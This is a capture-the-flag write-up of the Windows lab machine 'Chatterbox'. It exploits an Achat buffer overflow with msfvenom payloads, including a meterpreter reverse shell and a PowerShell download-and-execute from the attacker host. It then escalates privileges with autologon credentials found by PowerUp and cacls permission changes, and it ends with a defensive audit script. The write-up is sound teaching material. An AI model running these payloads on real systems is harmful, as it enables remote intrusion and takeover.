Today we’re going to solve another CTF machine, “Chatterbox”. It is now a retired box and is accessible to VIP members.

Specifications

• Target OS: Windows
• Services: 9255, 9256
• IP Address: 10.10.10.74
• Difficulty: Medium

Contents

• Getting user
• Getting root

Enumeration

As always, the first step is the reconnaissance phase, starting with port scanning.

Port Scanning

During this step we identify what services are running behind the IP address.

nmap -p 1-65535 -T4 -A -v 10.10.10.74

Enumerating Port 9255

Nmap reveals an Achat service running over HTTP.

We got nothing here, so let’s move ahead.

Enumerating Port 9256

We know there’s an Achat application installed. To find its version we could try banner grabbing, but in this case it didn’t work.

Let’s look it up with searchsploit:

searchsploit achat

Exploit: Achat 0.150 beta7 – Remote Buffer Overflow

searchsploit -m exploits/windows/remote/36025.py

Let’s edit our exploit.

Exploitation

Exploit: https://www.exploit-db.com/exploits/36025

Method #1

Let’s create our payload first and insert it into the exploit.

msfvenom --platform Windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1337 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

We executed the exploit and started listening for our reverse shell.

The reverse shell kept getting closed, so we migrated to another process automatically on execution:

set AutoRunScript post/windows/manage/migrate

System Information

Method #2

msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.27:8000/Invoke-PowerShellTcp.ps1')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

However, the Metasploit shell is much more convenient.

The user flag can be found at C:\Users\Alfred\Desktop\user.txt

Privilege Escalation

Let’s start with basic privilege escalation enumeration.

Running through basic priv esc enumeration with the PowerUp.ps1 script, we got autologon credentials stored in the registry.

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

DefaultUserName: Alfred
DefaultPassword: Welcome1!

There’s a possibility that the password is reused for the Administrator account. But since we already have access to the Administrator directory as user Alfred, as shown in the screenshot below, we don’t need it.

We can change the permissions on root.txt using cacls.

C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop 
cacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F 
                               CHATTERBOX\Administrator:(OI)(CI)(ID)F 
                               BUILTIN\Administrators:(OI)(CI)(ID)F 
                               CHATTERBOX\Alfred:(OI)(CI)(ID)F 


C:\Users\Administrator\Desktop>cacls root.txt /g Alfred:r
cacls root.txt /g Alfred:r
y
Are you sure (Y/N)?processed file: C:\Users\Administrator\Desktop\root.txt

C:\Users\Administrator\Desktop>cacls C:\Users\Administrator\Desktop\root.txt
cacls C:\Users\Administrator\Desktop\root.txt
C:\Users\Administrator\Desktop\root.txt CHATTERBOX\Alfred:R
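From the defender’s side, the two weaknesses this box turns on are a cleartext autologon password in the Winlogon key and an inherited ACE that hands a regular user rights on the Administrator profile. The following PowerShell audit, added here and not part of the original writeup, flags both; the profile path, the set of expected principals and the use of $env:COMPUTERNAME for the local machine name are assumptions to adjust per host.

```powershell
# Added audit script (not from the writeup). Run in an elevated PowerShell on the host
# being reviewed. Reports, without printing any secret, the two misconfigurations
# that were abused on this box.
$findings = @()

# 1. AutoLogon: a DefaultPassword stored in cleartext under Winlogon is readable
#    by any local user (this is exactly what PowerUp reported above).
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$wl = Get-ItemProperty -Path $winlogon
if ($wl.AutoAdminLogon -eq '1') {
    $findings += "AutoAdminLogon is enabled for user '$($wl.DefaultUserName)'"
}
if (-not [string]::IsNullOrEmpty($wl.DefaultPassword)) {
    $findings += "Cleartext DefaultPassword present under $winlogon (value not shown)"
}

# 2. Profile ACL: only SYSTEM, the Administrators group and the Administrator
#    account itself should hold Allow entries on the Administrator profile.
#    Path and principal list are assumptions; adapt them to the host.
$adminProfile = 'C:\Users\Administrator'
$expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', "$env:COMPUTERNAME\Administrator")
if (Test-Path -Path $adminProfile) {
    foreach ($ace in (Get-Acl -Path $adminProfile).Access) {
        $who = $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and $expected -notcontains $who) {
            $findings += "Unexpected ACE on ${adminProfile}: $who has $($ace.FileSystemRights)"
        }
    }
}

if ($findings.Count -eq 0) { 'No findings' } else { $findings | ForEach-Object { "[!] $_" } }
```

Remediation for a hit on either check is to clear DefaultPassword (or keep it only as an LSA secret via Sysinternals Autologon) and to remove the extra principal from the profile with icacls /remove.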